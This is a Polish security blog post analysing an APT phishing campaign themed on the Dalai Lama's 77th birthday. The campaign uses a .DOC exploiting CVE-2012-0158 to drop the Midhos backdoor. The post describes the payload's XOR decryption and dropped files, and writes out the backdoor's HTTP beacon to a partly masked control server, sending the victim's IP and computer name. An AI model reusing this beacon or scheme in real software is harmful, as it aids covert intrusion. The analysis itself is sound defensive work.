Niedawno pisaliśmy o tym, że Dalajlama jest stałym użytkownikiem Maka. O ile jest to prawda w przypadku jego świątobliwości, nie wszyscy jego zwolennicy korzystają z Maków.
Pewnie zastanawiasz się, jakie to ma znaczenie? Otóż 6 lipca jego świątobliwość skończy 77 lat – dość okrągła rocznica. Nie ma zatem nic dziwnego w tym, że już teraz odnotowujemy ataki wykorzystujące temat „urodzin Dalajlamy”.

3 lipca wykryliśmy nową kampanię ataków APT, w której wysyłane były wiadomości z tematem: “Dalai Lama’s birthday on July 6 to be low-key affair”:

 

Do wiadomości dołączony jest plik .DOC, który wykorzystuje lukę CVE-2012-0158 (nazwa pliku stanowi bardzo popularny temat w przypadku takich ataków).

Tym razem exploit jest przeznaczony dla komputerów działających pod kontrolą systemu Windows.

Kod powłoki x86 w pliku .DOC deszyfruje główne ciało backdoora w blokach o rozmiarze 1 KB przy pomocy prostego szyfru “xor pos + ror 3”:

Po tym, jak główne ciało backdoora zostanie zdeszyfrowane, jest wrzucane na dysk jako “CONIME.EXE”. Następnie wrzuca ono DLL (CONIME.DLL) oraz plik konfiguracyjny (CONIME.INF). Obecnie te dwa komponenty są wykrywane jako Trojan.Win32.Midhos:

CONIME.dll wykrywany jako Trojan.Win32.Midhos.fuy

CONIME.exe wykrywany jako Trojan.Win32.Midhos.fuz

DLL implementuje główną funkcjonalność backdoora poprzez trzy eksportowane funkcje:

• CommunicateToClient
• InstallProgram
• RunProgram

Podobnie jak w innych przypadkach, plik konfiguracyjny backdoora (CONIME.INF) jest zaszyfrowany:

Algorytm szyfrowania jest tutaj inny; jest to pętla, która wykonuje operację XOR ze zmiennym kluczem.

Po zdeszyfrowaniu można odczytać plik konfiguracyjny backdoora:

Adres serwera kontroli (61.178.77.*) jest dokładnie taki sam jak ten użyty w poprzednim analizowanym przez nas ataku.

Backdoor próbuje łączyć się z serwerem kontroli za pośrednictwem HTTP na porcie 1080, z modułem po stronie serwera o nazwie WinData{ UWXYZ}.Dll:

Poniżej pełne żądanie HTTP:

GET http://61.178.77.*:1080/WinData1158.Dll?HELO-STX-2*IP_ADDR*COMPUTERNAME*$ HTTP/1.0

W odpowiedzi serwer zwraca zaszyfrowane pakiety zawierające polecenia dla backdoora.

Jeżeli działanie exploita powiedzie się, zamiast tego zostanie wyświetlony „fałszywy” dokument, który zawiera artykuł z indyjskiej gazety „The Tribune, Chandigarh”. Oryginalny artykuł został napisany przez “Lalit Mohan”:

Zakończenie

Znane osobistości, takie jak Tenzin Gyatso, obecny Dalajlama, są stałym celem ataków APT. Ze względu na 77 urodziny Dalajlamy, które obchodzi 6 lipca, spodziewamy się intensyfikacji takich ataków.
Przez ostatni miesiąc odnotowaliśmy prawie 500 zgłoszeń dotyczących trojana Trojan.Win32.Midhos – rodziny backdoorów wykorzystywanych przez te konkretne osoby stosujące ataki APT.

Warto przypomnieć, że w przeszłości zaznaczaliśmy, że ściśle mówiąc, wiele z takich ataków APT (Advanced Persistent Threat) nie jest „zaawansowanych”. W wielu przypadkach, nie „utrzymują się również aż tak długo” – dość szybko zostają wykryte przez produkty antywirusowe i usunięte z systemów.

Z pewnością można jednak powiedzieć, że są uporczywe.